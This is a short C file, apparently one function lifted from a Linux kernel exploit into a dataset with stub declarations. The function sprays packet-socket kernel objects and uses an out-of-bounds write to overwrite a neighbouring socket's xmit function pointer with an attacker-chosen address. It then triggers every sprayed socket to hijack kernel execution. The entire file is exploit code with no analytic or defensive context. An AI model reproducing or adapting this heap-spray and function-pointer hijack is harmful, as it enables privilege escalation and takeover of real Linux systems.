
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ XMIT_OFFSET ;
 int memset (char*,int ,int) ;
 int oob_setup (scalar_t__) ;
 int oob_write (char*,int) ;
 int packet_sock_id_match_trigger (int) ;
 int packet_sock_kmalloc () ;

void oob_id_match_execute(void *func) {
 int s = oob_setup(2048 + XMIT_OFFSET - 64);

 int ps[32];

 int i;
 for (i = 0; i < 32; i++)
  ps[i] = packet_sock_kmalloc();

 char buffer[2048];
 memset(&buffer[0], 0, 2048);

 void **xmit = (void **)&buffer[64];
 *xmit = func;

 oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);

 for (i = 0; i < 32; i++)
  packet_sock_id_match_trigger(ps[i]);
}
